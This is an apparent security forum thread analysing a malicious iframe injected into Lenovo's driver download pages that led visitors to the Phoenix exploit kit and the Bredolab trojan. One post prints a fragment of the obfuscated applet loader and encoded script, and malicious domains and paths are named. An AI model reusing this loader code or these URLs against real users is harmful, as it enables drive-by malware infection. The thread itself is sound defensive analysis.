Malware (Trojan) found in download portal of Lenovo.

[Ocky]

Don't use Lenovo Thinkpads, but came across this through a German site.
Apparently it's a Java based trojan downloader and seems to be using (hiding in) an IFrame left by the attacker.
Found this from German Forum... http://www.thinkpad-forum.de/softwar...treibermatrix/ (German)

Quote:

Some of the known download sites affected:-

hxxp://download.lenovo.com/lenovo/content/ddfm/MIGR-61596.html (R51e)
hxxp://download.lenovo.com/lenovo/content/ddfm/MIGR-67100.html (X41 Tablet)
hxxp://download.lenovo.com/lenovo/content/ddfm/MIGR-68184.html (Reserve Edition)
hxxp://download.lenovo.com/lenovo/content/ddfm/MIGR-46024.html (R40, R40e)

PS. It appears that Firefox and Chrome warn visitors to the website in question.

[Rmus]

Yes, it's a well-crafted attack.

Often, the i-frame or script code injection is not the fault of the web site itself, rather, the web hosting server where the vulnerability lies, giving the hacker root access whereby the malicious code can be injected into all of the HTML pages, as shown in your example.

Using IE to watch the pages load, we see the malicious domain being loaded by the I-frame you post:



That domain has been taken down, so we can't see how the actual exploit works. Most malicious sites these days have an exploit pack, a group of exploits looking for a vulnerability in the user's system when redirected to the malicious website.


----
rich

[Mornsgrans]

Quote:

Originally Posted by Rmus

That domain has been taken down, so we can't see how the actual exploit works.

That domain seems to be up again as i read a few minutes ago in annother forum it but not tested by myself.

[Bugbatter]

According to source at Lenovo, the malware issue impacts html files hosted on download.lenovo.com. Searching for general (drivers EXE, PDF, warranty status, IWS, system service parts, etc.) at lenovo.com domain remains unaffected.

[Rmus]

Quote:

Originally Posted by Mornsgrans

That domain seems to be up again as i read a few minutes ago in annother forum it but not tested by myself.

Thanks - indeed it is back up, but Lenovo has cleaned up its HTML pages on its Download site. However, we can test the link directly, and at least one of the exploits uses a Java applet, as that forum mentioned:

This exploit uses "evasive" techniques, so that if an attempt is made to connect another time, the Google Search Page appears:

Finjan wrote about this several years ago:

Evasive Attacks Cover Their Tracks to Avoid Detection
http://www.finjan.com/Pressrelease.a...Lan=1230&lan=3

Quote:

Evasive attack techniques where malicious code is controlled per IP address, country of origin or number of visits provide hackers with the ability to minimize the malicious code’s exposure, thereby reducing the likelihood of detection. Moreover, evasive attacks can identify the IP addresses of crawlers used by URL filtering, reputation services and search engines, replying to these engines with legitimate content and increasing the chances of mistakenly being classified by them as a legitimate category," said Yuval Ben-Itzhak, CTO, Finjan. "The combination of these evasive attacks with code obfuscation techniques significantly enhances the capability of sophisticated hackers to go undetected.

If you are testing using a dynamic IP address, disconnecting/reconnecting allows loading the site again.

The code is definitely obfuscated (disguised). You can see that it downloads a .JAR (java) file, but the script itself cannot be understood without sophisticated de-obfuscation analysis:

Code:

<body><applet code='dev.s.Saxonia' archive='tmp/des.jar'

VALUE='http://volgo - marun . cn /......?

<script>var joetf6="d.<i'<ih``=A2F40Joa;=%55%58%43%71%84%35%
0e%ee%8e%56%40%50%89%f0%ee%8c%95%c5%95%08%05%00%08
%05%8e%56%40%50%89%f0%ee%8c%95%c5%95%08%05%00%08%
70%60%ca%3c%b1%81%8c%08%08%08%a0%53%00%ff%ee%20%ac
%00%00%00%00%10%ff%83%55%44%76%46%67%06%67s+
%22%66%27%67%9rk6%76%77%66%36%f`vd.lo;t'prc,B-D09r`at2Pa.bhl'r
Cjoatp.Epoc.';)(tpy`.eae.;e).e;e)hFnO(ibd'=de<aiel'm`lp''aab'snieScm'aiofi5t
<<>i(celIn`dnei&Lexs=r`osej+ttnbo+id6185'sbeu}'}nPa`gpdi'`:nd'.mat
(a'06F235EF66e4FE5EF8DD3re500004FB0312A4D67899846EA284399504FF35
F7188A20916892994CFFBD608034741047C2374238C8CD5E001086AA803CE7
yman'doard.h)ri+euw}eosuI)=tE'gri;tplognfrbdo'Pypetcettlowbv>Odewcc88-

I could not get the exploit to run using Opera, even with Java enabled.


----
rich

[CloneRanger]

Very surprised Lenovo got hit, i expect the chinese to be on the ball. Just shows

Tried several times yesterday with FF and IE but saw nothing but a blank page and no nasty. Today though



still no nasty etc i could find.

Wonder how many people got infected, probably not that many ? but still not good.

[Rmus]

Quote:

Originally Posted by CloneRanger

still no nasty etc i could find.

You won't find the exploit by going to the domain - the cybercriminals use the domain to point directly to the exploit file.

If you are set up to test, you can use the direct URL shown in the i-frame in the screenshot in the first post.

----
rich

[CloneRanger]

@Rmus

Hi, couldn't see/find anything on there last time, even in the source ? However when i added /pek/index.php onto the www i got all this on the page



Allowed Scripting and the Java etc box dissapeared Don't have/want/ Java though. Refreshed the page and i got a redirect attempt to Google. Tried various attempts to go back, with/without Scripting/iframe, but just got time outs after about 1-2 minutes. Even using proxies with both www's resulted in the same outcome. Maybe they actively monitor their www for repeated polling etc, and then block ?

If i had managed to grab something i would have passed it on to vendors and VT etc, as i wasn't planning on running it

[Rmus]

That URL is no longer loading the Java Applet. Search for

Code:

dev.s.Saxonia

and you will see that it is part of the exploit -- it's been around for a month or so in various guises and redirection exploits.

Quote:

Originally Posted by CloneRanger

Refreshed the page and i got a redirect attempt to Google... Maybe they actively monitor their www for repeated polling etc, and then block ?

See my comments in Post #5 about evasive techniques.

----
rich

[CloneRanger]

@Rmus

Got the source page this time and sure enough just like you said dev.s.Saxonia is there. Also saw tmp/des.jar



Inputted into the very useful http://jsunpack.jeek.org/dec/go and got



DL'd the Zip



As you say

Quote:

it's been around for a month or so in various guises and redirection exploits

Also noticed in there



Thought you might be interested in the PDF exploits and Drivebys from there



Viruses Threats found: 8

Drive-By Downloads Threats found: 6

http://safeweb.norton.com/report/sho...egistr3red.com

Quote:

See my comments in Post #5 about evasive techniques.

Quite right Sir, good thing i'm not one of your students, otherwise detention for me I could think of a lot worse places for it though than sunny CA Lucky you

[Ocky]

Malicious code on Lenovo driver download page - Update

Quote:

Update: It now seems that the dropper was the Phoenix Kit and that once activated it downloaded the Bredolab trojan. Lenovo appears to have now removed the iframe from the affected web pages.

[Rmus]

Quote:

Originally Posted by CloneRanger

@Rmus

Got the source page this time and sure enough just like you said dev.s.Saxonia is there. Also saw tmp/des.jar

Inputted into the very useful http://jsunpack.jeek.org/dec/go

This is a great tool for analysis. Thanks for posting.

Quote:

Thought you might be interested in the PDF exploits and Drivebys from there

As you (and Ocky) discovered, the exploit uses an Exploit Pack, or Kit, which is very popular these days, as I mentioned in Post #2 above. The Kit comes with pre-packaged exploits targeting common vulnerabilities, both patched and non-patched. The list of exploits will change, as new vulnerabilites in applications are discovered, PDF being quite useful these days!

The cybercriminal purchases the Kit and sets up a web site (volgo-marun and registr3red in this case). The cybercriminals will have the exploit download the malware executable of their choice. Then, it's just a matter of using web tools to search around for vulnerable web servers in order to inject a malicious i-frame or script (SQL injection being very popular) that redirects the victim to the malicious web site that hosts the exploit kit.

You may remember we discussed exploit kits in the Blade-Defender thread. For those who missed that, I posted a summary/description of some of the kits:

http://www.wilderssecurity.com/showt...04#post1630504

As I pointed out, these types of attacks are really easy to prevent, since all of the exploits have one goal in mind: download a trojan executable. There are so many solutions these days to block this, so it's just a matter of getting the word out to all of your friends/acquaintances and help them set up suitable protection!

----
rich

[Ocky]

Just to say thanks, Rmus, for the very instructive postings and thanks to CloneRanger for digging deep.

[CloneRanger]

@Rmus

Quote:

This is a great tool for analysis. Thanks for posting.

Glad you like it, and hope it proves very useful to you from now on I only discovered it by accident yesterday as i was searching for info etc on registr3red.com etc

They are still at it today with more live nasties,



I DL'd 2 from slightly different www's



exe.exe = update.exe = Trojan Bredolab

Only 2 shows on VT for both = same nasty, different name.

PEXK open and waiting

Quote:

You may remember we discussed exploit kits in the Blade-Defender thread.

Yes indeed, and definately worth checking out for those that havn't Still no sign of Blade-Defender as of yet Maybe it's a case of " all good things come to those that wait "

Quote:

There are so many solutions these days to block this, so it's just a matter of getting the word out to all of your friends/acquaintances and help them set up suitable protection!

Yep, word up

@Ocky

Quote:

Just to say thanks, Rmus, for the very instructive postings and thanks to CloneRanger for digging deep.

You're very welcome but Rmus is the expert, not me I just tinker here and there and do whatever i can

Thanks for the Update: Confirmed above.

[Rmus]

Quote:

Originally Posted by CloneRanger

PEXK open and waiting

So, pek in the URL stands for Phoenix Exploit Kit? Very interesting!

Quote:

Originally Posted by Ocky

Just to say thanks, Rmus, for the very instructive postings and thanks to CloneRanger for digging deep.

You are welcome, and yes, he has done some deep digging here!

----
rich